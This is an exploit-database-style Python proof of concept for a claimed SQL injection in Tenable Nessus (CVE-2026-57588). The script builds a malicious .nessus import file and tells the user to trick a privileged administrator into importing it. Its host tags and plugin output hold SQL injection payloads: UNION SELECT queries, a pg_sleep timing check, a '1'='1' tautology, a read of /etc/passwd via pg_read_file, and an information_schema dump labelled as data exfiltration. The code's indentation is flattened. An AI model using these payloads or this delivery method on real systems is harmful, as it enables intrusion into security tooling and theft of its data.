# Exploit Title: Tenable Nessus 10.12.1 - SQL Injection
# CVE: CVE-2026-57588
# Date: 2026-06-26
# Exploit Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# Author GitHub: https://github.com/mbanyamer
# Author Blog : https://banyamersecurity.com/blog/
# Vendor Homepage: https://www.tenable.com
# Software Link: https://www.tenable.com/downloads/nessus
# Affected: Nessus 10.12.0 and prior
# Tested on: Nessus 10.12.0
# Category: Remote
# Platform: Linux / Windows
# Exploit Type: SQL Injection
# CVSS: 4.3 (Medium)
# Description: A SQL injection vulnerability exists in Tenable Nessus when importing malicious scan result files (.nessus XML).
# Successful exploitation allows data exfiltration from the backend database by a privileged user.
# Fixed in: Nessus 10.12.1 and later
# Usage:
# python3 exploit.py -o malicious.nessus
#
# Examples:
# python3 exploit.py
# python3 exploit.py --output poc.nessus
#
# Options:
# -o, --output Output filename for the malicious .nessus file
#
# Notes:
# • This is a Proof of Concept. Requires social engineering to trick a privileged user into importing the file.
# • Works best against PostgreSQL backend (default in Nessus).
#
# How to Use
#
# Step 1:
# Generate the malicious file using this script.
#
# Step 2:
# Deliver the .nessus file to a Nessus administrator and have them import it via the web interface.
def banner():
print(r"""
╔██████╗ █████╗ ███╗ ██╗██╗ ██╗ █████╗ ███╗ ███╗███████╗██████╗╗
║██╔══██╗██╔══██╗████╗ ██║╚██╗ ██╔╝██╔══██╗████╗ ████║██╔════╝██╔══██║
║██████╔╝███████║██╔██╗ ██║ ╚████╔╝ ███████║██╔████╔██║█████╗ ██████╔╝
║██╔══██╗██╔══██║██║╚██╗██║ ╚██╔╝ ██╔══██║██║╚██╔╝██║██╔══╝ ██╔══██╗
║██████╔╝██║ ██║██║ ╚████║ ██║ ██║ ██║██║ ╚═╝ ██║███████╗██║ ██║
╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═══╝ ╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝
╔═╗ Banyamer Security ╔═╗
""")
import argparse
import xml.etree.ElementTree as ET
def create_malicious_nessus(output_file):
root = ET.Element("NessusClientData_v2")
report = ET.SubElement(root, "Report")
report.set("name", "PoC - CVE-2026-57588")
host = ET.SubElement(report, "ReportHost")
host.set("name", "poc-target.example.com")
host_properties = ET.SubElement(host, "HostProperties")
tags = [
("hostname", "evil-host' UNION SELECT NULL, current_database(), version(), user() -- "),
("os", "Linux' AND (SELECT pg_sleep(5))=0 -- "),
("ip", "192.168.1.1' OR '1'='1"),
("fqdn", "test' ; SELECT pg_read_file('/etc/passwd') -- "),
]
for name, value in tags:
tag = ET.SubElement(host_properties, "tag")
tag.set("name", name)
tag.text = value
item = ET.SubElement(host, "ReportItem")
ET.SubElement(item, "pluginID").text = "999999"
ET.SubElement(item, "pluginName").text = "CVE-2026-57588 PoC"
ET.SubElement(item, "port").text = "0"
ET.SubElement(item, "protocol").text = "tcp"
ET.SubElement(item, "severity").text = "0"
ET.SubElement(item, "description").text = "Proof of Concept for SQL Injection"
plugin_output = ET.SubElement(item, "plugin_output")
plugin_output.text = """Normal output
' UNION ALL SELECT
'=== DATA EXFIL START ===',
table_name,
column_name,
'=== DATA EXFIL END ==='
FROM information_schema.columns
WHERE table_schema = current_schema() -- """
tree = ET.ElementTree(root)
with open(output_file, "wb") as f:
tree.write(f, encoding="utf-8", xml_declaration=True)
print(f"[+] Malicious file successfully created: {output_file}")
print("[+] Deliver this file to a privileged Nessus user for import.")
def main():
banner()
parser = argparse.ArgumentParser(description="CVE-2026-57588 Nessus SQLi PoC")
parser.add_argument("-o", "--output", default="cve-2026-57588-poc.nessus", help="Output filename (default: cve-2026-57588-poc.nessus)")
args = parser.parse_args()
create_malicious_nessus(args.output)
if __name__ == "__main__":
main()